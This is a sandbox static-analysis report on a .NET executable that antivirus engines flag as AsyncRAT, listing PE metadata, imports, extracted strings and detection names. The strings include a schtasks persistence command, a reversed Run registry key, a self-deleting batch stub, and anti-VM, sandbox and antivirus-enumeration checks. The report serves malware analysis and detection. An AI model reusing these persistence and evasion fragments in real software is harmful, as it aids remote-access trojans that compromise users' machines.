Static | ZeroBOX

PE Compile Time

2023-10-17 06:40:53

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000b064 0x0000b200 5.61872872157
.rsrc 0x0000e000 0x000007ff 0x00000800 4.88506844918
.reloc 0x00010000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x0000e0a0 0x000002cc LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0000e36c 0x00000493 LANG_NEUTRAL SUBLANG_NEUTRAL exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
WGSZzPdPhTHdBEA
UyeCuZbrqXzUWTA
nktsYYywWUsnYHWA
sQMOntpBbA
jXkzuofXvcVlA
rxWnIsHBvnA
vLIvXvZtxswA
GBzDafuieKKhxA
jgYfasmcXDytCB
RRveBMmDDKSDB
hjfOPSRfshzSB
oroqnJpUmDjfKTB
xrhOAiAlsGVB
qQONQqVktYB
QDrmyGDZXbB
RMcZdvlQFAmB
mTdjOZHwKdCC
pIvdqlkkggMKC
jvzIsGqBLYvxBOPC
dcbuZbcfLHXC
WRjwKgpxcPPNpC
lUmEZtNeClIfxC
MapNameToOID
get_FormatID
WtGEKfxlLNRD
JqybJttSTD
prxlQkspuoOUD
DKjOsfDVBRhUD
RjNxIpTEXD
OdvBvvPjJqNHrjD
dnmMZcuYMHGWnAWlD
xgwXADSbVLbiHE
ANkARIrWqE
nTjOdKQTfKKAF
LkpukjKljFeaNrJFF
BbMzDixtgoLF
NlpbXeJXejzbQF
VLetQXRnhWRF
PmGDEkEWaYF
AOVoIQPNRddF
kfboxyYznF
GjAfwsaaboF
rGCWkVCigjSG
fzuZPDUJDTcG
WXhnBfFviG
nRNANTGLUVRpG
mpnDyYIDiqG
OjaMSYaFodHvG
mrCwLATvjqILH
KOJZcmnTdWhOyPH
ASFCNWYWEkcH
KCFNTQBpPsNdH
sIAdFWOSggH
rPNxUuWJcuUmH
AUkqJeOFjuQBI
get_ASCII
kBurorMsLVLI
QyOXQaiqaWUWI
DltPdgHvKxI
yNPHnYpXVDJ
aOgAlInFsFJ
rUlqgBlNIJ
YiuxgAGkCVJ
iPIAMSZjVJ
tiTULvuXCdJ
lSHRdyjduyGK
QUBmYxUTAbK
vAPQpKRZdK
dMwTXDacgK
tEyRlMojkNhK
tGfQFNVnFmK
MqzBxvotJhvrvK
GvQwHDfugmCL
cNUvJOKuqhKKL
mnepfQYuNL
hbTUiLHIUDUtusRL
hBTltcbaRqLVL
fjvZiqFLnFWL
KmAjhGZYjhcL
FGCdRmhXypL
xxujvzgQQQIvL
SpBoIRDhszIyL
MFMfMgtedgNCM
sDCPQXCyhM
dtcUcedKesM
rNXDgXztHtM
pdqZgcDeVFHwDN
RHWFDtpMIiUN
BFmAULTrSjHivN
pzbypZJmqqZTEzN
NfDKyuNTdCO
System.IO
SdZoXRJPCxHALO
kljefRyDxGiKoMO
IrNmzsiIUO
zIhXaDCGCrSyRjO
PxHLxtOdxVKiknO
ewvyNPynzLpgjBtO
xwVbgdyZyFxO
jlFqslcqzO
WiSlEcRTKAkGvCP
oBFexEpvIhIGP
rTkASMySYUP
YOsliCbFZXyIWP
zsBluaIZjhdXP
HokqPIgaQLZP
bvdsFjSDzFvdP
TdDyeXDJdqiqP
MlyZQZRixP
xolxCAJeDQ
FSdfaSgQJJQ
HfSvPKXBRQ
DqIEWhVUztbQ
wjmseAjBzazvQ
QBxBsyfdgyMSOjIDR
wpGWlfgZXDhR
sWCmEeOYrjIaxR
bJKUFfoaoqGLS
bLaAcfDirtMS
yoGvgVXVQDQS
FkMHQhXKwXKVYS
zzxhszHLdHT
MwoLVfjpoAIT
PasotZBoBIT
YslhLxtGYT
vrpRHksNIObT
ockwoAFSoT
CVwSNYsWNeWtT
gbMlqorZhFPHU
wTuYZirerPbU
dLqciYxkuhU
IPcxdyZWooiU
vgXGeBuFfBlU
xLOzCdxHpU
OuocWGUZzyBwkvU
OGUkZLUpxPSHkwU
get_IV
set_IV
GenerateIV
CgbJVshUevTvBbV
wIuBjQkjsieCJcV
JwaDUIsEzqSsKgV
BMcYDwqzxeVhV
fIJdPsHlxmepV
pEkGXBgnCFvXW
YnTEQyeerciYjVfW
GMdKDocLhQXqW
DRyoshFRhrlQYsW
XiwLCwBjLwUAX
PMdDYdrDpSVJX
vVwuSeHxVCcXX
WkUvTvJDwPbX
EfVjjKiDmgKnX
PwHtzAfQmtoX
dTfQbCfeYMhsX
fxGyFpLEWiwtX
gtRqcFmgNuX
SwLFzmScCYgvX
EYKBTpkdJgpY
ItuyInRwyQYGZ
iILNLkgqnUQIZ
FbxNcxKHQVIZ
OvpmpsRcAiuAzZ
sQUzlxkViDzZ
value__
vsDaJZzmzJa
cnTERPMLVEiwtiIPa
gQcrTcofWca
AVpbFHHcBnDpca
twIPrUIelMaLbDia
EqpnmilMziua
haHgPQZnAya
HwZLpNeeUjIb
mvnaTSTdPEZb
mscorlib
uhvNBRKfJc
AOebSYQEUc
DfwsHVEububc
jsToKHgfnGdc
System.Collections.Generic
Microsoft.VisualBasic
ZkvfgSBWoVjc
get_SendSync
RuntimeBrokerSvc
imUTrnJbnjmxc
sozCBCuvCqwUQTPzc
motmKWWFmpXUuFd
ejPzNnKzXTnKd
LRtqlfmshafUd
EndRead
BeginRead
Thread
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
AMKPFXMnGhld
Append
RegistryValueKind
zhecHJidYbhprd
FHBymeWvWvd
XSOxzeDUwd
yfJpLlgBHXCCe
CsztMObsQaKjKe
Replace
CreateInstance
XRBDsyZLFXde
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
cMysiVHffVLf
PTLJwGxMmNYwRf
EtMrXlKKubf
OcWGCHprSudf
aGIidfgZhmf
jCHfHlOgdSppf
vxvaHfILtf
CEeSqRXWqaTfJxf
HbTzAqaZtjAg
FQeaIgDLPEg
naMYuGXPECrEg
VeWrKpmTAVZg
FgdyoyGQiLOBLEeg
CryptoConfig
dYnjQpzcaXmjg
VnezXtrmmg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
hFnDVKCYUwg
KtEtxHBWyg
CYrJsVHnoSHh
qQlzwoacLhrcxSAMah
IfZDtncumVnmh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
CNiiwDHmiXxhSxh
RGNGTMvSENVIi
HpvfKQYrlrtci
VrTeKawTwWLj
vpIjjozHSfj
RtulgIvMYUhj
JVSGxsksAgwj
giqqyaxvuREk
vZQtTedbJvilxvGk
lGEEZUaAUwdJJk
efORCYNttFSk
yRBDoBtyBZk
CUQldytZTahnbk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
kAQLhSWEjVxck
zObulfKuaZik
EzimyXqLYWrAMmjk
IFfcDampahsnk
ELDHCftFCKISDok
LIMhfkFvfBl
ArfGmxuhbfeFl
lGTOsJEVzfLJl
skwsFewKqZHeLRl
gWhmTZOewoWl
eLVIEnRpWl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
wUlhCPiBHubl
TxTtzFxgmQfl
JcgxOwoEgl
rqnlxUFIbIgl
kernel32.dll
user32.dll
ntdll.dll
pCKGvWncHSuWGm
XuIpTCvfUELm
aqWJYiqLTHUm
wWHsLrnRORWm
vJBPHibHlevWm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
aKUVletGsGPdom
Random
TMGBKLMknMWaqm
ICryptoTransform
jmVZEkquMuQn
ToBoolean
ThkGviMsBewAbn
X509Chain
AppDomain
get_CurrentDomain
KhabydtEmjin
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
hfhIDOTGpbpqn
xYcypQGWupsn
nObfGhxeMo
UlyRhjmhkcXrbPo
UvOYsAvHufOyTo
dXzCbIgiHvUo
XniDAeSHpLiwYo
pSLBpkFnsbo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
dlQdUtgAPXoBp
JSfMazpDRSdDp
ZXCIiOxXVpNp
gxMLoaSYAUp
HoevFiggkRegBXp
XsyJPRcQFHep
ADYtfsFsatHep
Microsoft.CSharp
fTXzUneXzp
zNDezqzYfZBBq
uLahegcHCq
URDyCwwqEVjDq
UmOHnWyvdHRlGq
axCAubYExdJJq
bfARPfKUNq
UDgUEpSIWRq
xGJKUyXyJOFtSq
pZmjbDRGaAlJWYq
QKVsHsnfHiulYq
WfFzVjdcQZfq
WZndFXgxJlbIiq
System.Linq
PWszmgeIMlcnXEr
LtASDdXPCSOaPGr
wxScorluvUQAIKr
xWMudCZvLr
uDOiEWEAYFdOr
QJMUfcpTddUr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
lfWaEAYpkQmr
ecpkEHdhsSnr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
ivTUlxjilcdIpr
DHZFcERovLszrr
IntPtr
nMoEupJSzctr
oZVQxaOIJIs
EnBUybQXuWUs
khiiNDTgfMbtXs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
HLarkvzbjiCjs
UNuqpAtRdHCxIxjs
ICredentials
set_Credentials
Equals
SslProtocols
TuJXfCqKwcbsPms
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
GizLmmDXts
System.Net.Sockets
set_Arguments
SystemEvents
Exists
BWzQDquNQfOxs
fZjWtuRbleHt
WsezMFCFiSWNt
mNelYSUWEpzhUt
Concat
ImageFormat
get_AsFloat
set_AsFloat
bQNMNGIDFYXfhxCct
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
SdYBKzJuHEKcKht
IAsyncResult
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
FAHRqFixHXwut
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
CJInRSVynENMHu
NlBhJWSTZIu
iWHFLeQvsFoxZVu
ZLeMzwUYIkau
TNENKTFzhqLXSbu
VaBRUiDjRrAjeu
jXwKRQuhGmIgu
eeeKUPKVuUhu
WZGCHwHJlu
xImVaSwEolu
EkJzanJUnu
trcLZfvsdWPvAv
vdAifppnVbrHyRKv
xJvFxXyarEXRkTv
lwZKZtAJNiv
hpVKZYDvBFWGw
FttxLrOFRmVlHw
xZbCzLUzkiVw
OyDoeThBIuYw
mxXsMMKBCDFQZw
VRAGYAqDiw
eyvFwqsORxYmw
GetForegroundWindow
set_CreateNoWindow
mhykqSZYshCperw
ufmCTbdSBtw
lQYDbwCoVtw
GLLhmEnlJQqYww
OeFaZyRzgazw
LeTWiRbTnRx
pWdxlKXadlx
WBtxWIrXODpx
fFecrDgastx
wRutAFoxbXkUy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
IymXmNpRGsy
bsBHtdOYhsqesy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
onIRlOFtOXAwy
vZvtjDawnczy
CWBcVsqumPGz
DnEKmiakiWz
MTWifRKnvElVjJcz
kbtNgsDxBSZtz
tCzcjywGduz
kEMACurKDJyvz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
Z3qxhZ+VVYrktCJBXlcCPSH6JAFa77+Q7qKT1ZiRSqPpXZokv5Ncezr9xXBLFBxzUmNy/ExvnFzgO8uY6KCGVw==
u9qavisGxaSqQtjtSROsT16vFfIOHRnwTSKqb/MhDo4lDqKvzklFcGUkNBNGsQhBbQoXPHWr6dH64GOgggZ2bQ==
cW2Tt8PrR/QtSTEODvpp/CQA5GrJkHhQ008rFMIYg7rqIUUJFHUSeS/cpAkuFI+oiKWJMSAqlwwBUGnbvBDSkA==
5PReH8utS+pGfG+XatUuLZ/EQGQPC/e0oTSdhmUbsSwOFURsoY4Gy2v/Q4eZyQiad78QhQw4f7+bAEFZ0dlPpQ==
%AppData%
RuntimeBrokerSvc.exe
ek1ZSklHeDJleFBXZ0NEMlVpaHlwdWEzZHQyaXpCeTI=
8mRK5q1SOBshHYzE3U3UhCshOxIWIB5PxHVKBf2l+1nOZclY2cay82fY6nHkpSFDED1Xn1g/53vMLqv2ujZhEw==
wIfqL1QlkD8fjrLVAbCxqMtYVk/0iHoTbCdRbMkxdc0QWsGCrxoqFXsuRuH3foBJjS3p88swfM28MuV4j0hnYQ==
1kEc8DIYTIzqZXEiphF3KoFuSVDqCHAE+unHDHVC7opqOCFDjT1suOZkuawf24WD6eaEa0PDyYBdaZbrZe4DKw==
YdA3a9gclDayP5Luxqb8qIusX7Gozb4ri4gWMd8LADlwUjjoEcQaghFC/20+O9Mdf6t9bkU5PvQVZBsXtBbmxQ==
WX0/n5v0RlrrPE4sWyCe/SE9AB9jJ5x1ZXDKbCujI3nT5cxZ4qqAM04TKRQmLvEWijFwkQlG7xYL8wSi4+h6Ag==
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Lionic Trojan.Win32.Crysan.m!c
Elastic Windows.Trojan.Asyncrat
MicroWorld-eScan Gen:Variant.AsyncRat.Marte.2
CMC Clean
CAT-QuickHeal Trojan.IgenericFC.S14890850
ALYac Gen:Variant.AsyncRat.Marte.2
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Backdoor:MSIL/AsyncRat.2067b0b6
K7GW Trojan ( 005678321 )
K7AntiVirus Trojan ( 005c228f1 )
huorong Backdoor/Crysan.a
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/AsyncRAT.A
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Cynet Clean
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
BitDefender Gen:Variant.AsyncRat.Marte.2
NANO-Antivirus Clean
ViRobot Clean
Tencent Trojan.Msil.Agent.zap
Sophos Troj/AsyncRat-B
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.Siggen9.56514
VIPRE Gen:Variant.AsyncRat.Marte.2
TrendMicro Backdoor.MSIL.ASYNCRAT.SMXSR
McAfeeD ti!040EF285CDBC
Trapmine suspicious.low.ml.score
CTX exe.trojan.msil
Emsisoft Gen:Variant.AsyncRat.Marte.2 (B)
Ikarus Backdoor.AsyncRat
FireEye Generic.mg.ee9bd2b3d64511b8
Jiangmin Backdoor.MSIL.gguk
Webroot Clean
Varist W32/Samas.B.gen!Eldorado
Avira TR/Dropper.Gen
Fortinet MSIL/Agent.CFQ!tr
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.AsyncRat.Marte.2
SUPERAntiSpyware Trojan.Agent/Gen-Kryptik
ZoneAlarm Troj/AsyncRat-B
Microsoft Backdoor:MSIL/AsyncRat.AD!MTB
Google Detected
AhnLab-V3 Malware/Win32.RL_Generic.C3558490
Acronis Clean
McAfee Fareit-FZT!EE9BD2B3D645
TACHYON Clean
VBA32 OScope.Backdoor.MSIL.Crysan
Malwarebytes Generic.Malware.AI.DDS
Panda Clean
Zoner Clean
TrendMicro-HouseCall Backdoor.MSIL.ASYNCRAT.SMXSR
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Clean
GData MSIL.Trojan.PSE.1BITXMO
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS
alibabacloud Rat:Win/AsyncRAT.Stub
No IRMA results available.